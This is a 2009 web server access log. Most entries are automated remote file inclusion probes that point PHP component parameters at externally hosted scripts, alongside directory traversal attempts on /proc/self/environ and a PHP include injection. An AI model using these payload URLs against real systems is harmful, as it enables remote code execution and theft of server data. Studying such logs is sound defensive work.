116.122.158.194 - - [13/May/2009:11:38:03 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
116.122.158.194 - - [13/May/2009:11:38:04 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
88.191.103.144 - - [13/May/2009:11:38:36 -0500] "GET /logs///skin/zero_vote/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.825"
88.191.103.144 - - [13/May/2009:11:38:36 -0500] "GET ///skin/zero_vote/setup.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.825"
66.232.102.70 - - [13/May/2009:11:39:59 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
212.97.132.101 - - [13/May/2009:11:40:12 -0500] "GET /?page=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 200 3233 "-""libwww-perl/5.53"
212.97.132.101 - - [13/May/2009:11:40:13 -0500] "GET /logs/?page=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 200 188856 "-""libwww-perl/5.53"
113.29.225.7 - - [13/May/2009:11:40:46 -0500] "GET /logs//index.php?abs_path=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
113.29.225.7 - - [13/May/2009:11:40:46 -0500] "GET //index.php?abs_path=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
113.29.225.7 - - [13/May/2009:11:40:46 -0500] "GET /logs/access_log.1236211200//index.php?abs_path=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
113.29.225.7 - - [13/May/2009:11:40:46 -0500] "GET /logs/access_log.1239580800//index.php?abs_path=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
113.29.225.7 - - [13/May/2009:11:40:47 -0500] "GET //index.php?abs_path=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
113.29.225.7 - - [13/May/2009:11:40:47 -0500] "GET /logs/access_log.1236211200//index.php?abs_path=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
113.29.225.7 - - [13/May/2009:11:40:47 -0500] "GET /logs//index.php?abs_path=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
113.29.225.7 - - [13/May/2009:11:40:47 -0500] "GET /logs/access_log.1239580800//index.php?abs_path=http://www.geocities.com/andrie_it/id1.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
92.50.143.90 - - [13/May/2009:11:41:16 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.ionthenet.co.kr/note_log/bajocdm2.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
92.50.143.90 - - [13/May/2009:11:41:16 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.ionthenet.co.kr/note_log/bajocdm2.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
212.227.96.166 - - [13/May/2009:11:41:59 -0500] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:11:41:59 -0500] "GET /logs/access_log.1239926400/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 368 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:11:41:59 -0500] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:11:42:09 -0500] "GET ///s_loadenv.inc.php?DOCUMENT_ROOT=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 302 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:11:42:10 -0500] "GET /logs/access_log.1236297600///s_loadenv.inc.php?DOCUMENT_ROOT=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:11:42:10 -0500] "GET /logs///s_loadenv.inc.php?DOCUMENT_ROOT=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 307 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:11:43:55 -0500] "GET /logs//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:11:43:55 -0500] "GET //modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:11:43:55 -0500] "GET /logs/access_log.1239580800//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:11:44:26 -0500] "GET //bbs/skin/zero_vote/setup.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:11:44:26 -0500] "GET /logs/access_log.1234828800//bbs/skin/zero_vote/setup.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:11:44:26 -0500] "GET /logs//bbs/skin/zero_vote/setup.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.249.67.180 - - [13/May/2009:11:44:28 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.180 - - [13/May/2009:11:44:28 -0500] "GET /logs/access_log.1117238400 HTTP/1.1" 200 664 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.89.33.167 - - [13/May/2009:11:44:37 -0500] "GET /logs/access_log.1238112000//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:11:45:18 -0500] "GET /logs/access_log.1238284800//bbs/skin/zero_vote/setup.php?dir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
116.122.158.194 - - [13/May/2009:11:46:23 -0500] "GET /logs//guestbook1//admin.php?include_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
116.122.158.194 - - [13/May/2009:11:46:24 -0500] "GET //guestbook1//admin.php?include_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:11:47:18 -0500] "GET /logs/access_log.1237507200//faqsupport/samplefaqsupport.php?path[docroot]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:11:47:18 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:11:47:18 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:11:47:18 -0500] "GET /logs/access_log.1238889600//faqsupport/samplefaqsupport.php?path[docroot]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
116.122.158.194 - - [13/May/2009:11:47:48 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
116.122.158.194 - - [13/May/2009:11:47:49 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
116.122.158.194 - - [13/May/2009:11:48:07 -0500] "GET /logs/index.php?configFile=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
116.122.158.194 - - [13/May/2009:11:48:08 -0500] "GET /index.php?configFile=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
116.122.158.194 - - [13/May/2009:11:48:16 -0500] "GET /logs/index.php?meio.php=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
116.122.158.194 - - [13/May/2009:11:48:16 -0500] "GET /index.php?meio.php=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
66.249.67.180 - - [13/May/2009:11:50:15 -0500] "GET /logs/access_log.1114041600 HTTP/1.1" 200 662 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
116.122.158.194 - - [13/May/2009:11:51:36 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
116.122.158.194 - - [13/May/2009:11:51:37 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
85.214.86.93 - - [13/May/2009:11:51:49 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:11:51:49 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:11:51:49 -0500] "GET /logs/access_log.1231372800//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:11:51:54 -0500] "GET /logs/access_log.1231545600//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
116.122.158.194 - - [13/May/2009:11:53:35 -0500] "GET /logs/main.php?pagina=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
116.122.158.194 - - [13/May/2009:11:53:36 -0500] "GET /main.php?pagina=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
212.227.96.166 - - [13/May/2009:11:53:44 -0500] "GET ////e404.php?DOCUMENT_ROOT=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:11:53:44 -0500] "GET /logs/access_log.1236297600////e404.php?DOCUMENT_ROOT=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:11:53:44 -0500] "GET /logs////e404.php?DOCUMENT_ROOT=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.97.132.101 - - [13/May/2009:11:57:29 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 404 312 "-""libwww-perl/5.53"
212.97.132.101 - - [13/May/2009:11:57:29 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 404 307 "-""libwww-perl/5.53"
66.249.67.180 - - [13/May/2009:12:00:17 -0500] "GET /logs/access_log.1230681600 HTTP/1.1" 200 95741 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.188.218.41 - - [13/May/2009:12:01:05 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 320 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
210.188.218.41 - - [13/May/2009:12:01:05 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 315 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
210.188.218.41 - - [13/May/2009:12:01:06 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
210.188.218.41 - - [13/May/2009:12:01:06 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
210.188.218.41 - - [13/May/2009:12:01:06 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 315 "-""XXXXXX"
210.188.218.41 - - [13/May/2009:12:01:06 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 320 "-""XXXXXX"
210.188.218.41 - - [13/May/2009:12:01:07 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-""XXXXXX"
210.188.218.41 - - [13/May/2009:12:01:07 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""XXXXXX"
211.233.19.201 - - [13/May/2009:12:04:06 -0500] "GET //?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3245 "-""XXXXXX"
211.233.19.201 - - [13/May/2009:12:04:06 -0500] "GET //?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3245 "-""XXXXXX"
211.233.19.201 - - [13/May/2009:12:04:13 -0500] "GET /logs//?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 189195 "-""XXXXXX"
211.233.19.201 - - [13/May/2009:12:04:16 -0500] "GET /logs//?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 189195 "-""XXXXXX"
85.214.86.93 - - [13/May/2009:12:04:30 -0500] "GET /logs/access_log.1230768000/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:04:30 -0500] "GET /logs/access_log.1237161600/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:05:43 -0500] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:05:43 -0500] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:05:43 -0500] "GET /logs/access_log.1231372800/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:05:43 -0500] "GET /logs/access_log.1233187200/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:12:07:45 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:12:07:45 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:12:07:45 -0500] "GET //components/com_virtuemart/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
116.122.158.194 - - [13/May/2009:12:07:50 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
116.122.158.194 - - [13/May/2009:12:07:50 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
202.89.33.167 - - [13/May/2009:12:07:52 -0500] "GET //components/com_virtuemart/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:12:07:53 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:12:07:53 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:12:07:59 -0500] "GET //components/com_virtuemart/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:12:07:59 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:12:07:59 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:12:08:05 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
202.89.33.167 - - [13/May/2009:12:08:05 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
116.122.158.194 - - [13/May/2009:12:08:06 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
116.122.158.194 - - [13/May/2009:12:08:06 -0500] "GET /modules/My_eGallery/index.php?basepath=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
202.89.33.167 - - [13/May/2009:12:08:16 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/errors.php?error=http://www.info-design.fr//language/fonts/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
85.114.132.122 - - [13/May/2009:12:09:07 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:12:09:07 -0500] "GET //components/com_virtuemart/errors.php?error=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:12:09:07 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:12:09:07 -0500] "GET //components/com_virtuemart/errors.php?error=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
116.122.158.194 - - [13/May/2009:12:09:22 -0500] "GET /logs/index2.php?content=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
116.122.158.194 - - [13/May/2009:12:09:23 -0500] "GET /index2.php?content=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.97.132.101 - - [13/May/2009:12:09:41 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 404 292 "-""libwww-perl/5.53"
212.97.132.101 - - [13/May/2009:12:09:41 -0500] "GET /convert/mvcw.php?vwar_root=http://blog.rollespil.dk/wp-admin/images/.readme???? HTTP/1.0" 404 287 "-""libwww-perl/5.53"
84.32.195.2 - - [13/May/2009:12:09:46 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:09:46 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:09:46 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:09:49 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
69.94.56.98 - - [13/May/2009:12:10:31 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.depo.org.pk/images/21/ts?? HTTP/1.0" 404 333 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
200.32.100.130 - - [13/May/2009:12:11:34 -0500] "GET /logs/access_log.1239926400//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
200.32.100.130 - - [13/May/2009:12:11:34 -0500] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
200.32.100.130 - - [13/May/2009:12:11:36 -0500] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
194.85.95.116 - - [13/May/2009:12:11:36 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
194.85.95.116 - - [13/May/2009:12:11:37 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.ionthenet.co.kr/note_log/ec.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:12:13:15 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:12:13:16 -0500] "GET //components/com_virtuemart/errors.php?error=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:12:14:14 -0500] "GET /logs//components/com_virtuemart/errors.php?error=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:12:14:14 -0500] "GET //components/com_virtuemart/errors.php?error=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
66.232.102.70 - - [13/May/2009:12:15:02 -0500] "GET //?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
66.232.102.70 - - [13/May/2009:12:15:02 -0500] "GET /logs/access_log.1240012800//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.232.102.70 - - [13/May/2009:12:15:05 -0500] "GET /logs//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 200 189195 "-""Mozilla/5.0"
66.232.102.70 - - [13/May/2009:12:15:43 -0500] "GET /logs/access_log.1239062400//?_zb_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
123.143.98.5 - - [13/May/2009:12:17:06 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://80.24.176.145/time//appserv/file.txt?%0D?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
123.143.98.5 - - [13/May/2009:12:17:06 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://80.24.176.145/time//appserv/file.txt?%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
123.143.98.5 - - [13/May/2009:12:17:06 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://80.24.176.145/time//appserv/file.txt?%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
85.214.86.93 - - [13/May/2009:12:17:19 -0500] "GET /logs/access_log.1233187200//data/shirohige/technote7/skin_shop/standard/2_view_body/skin_shop/standard/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 396 "-""Mozilla/5.0"
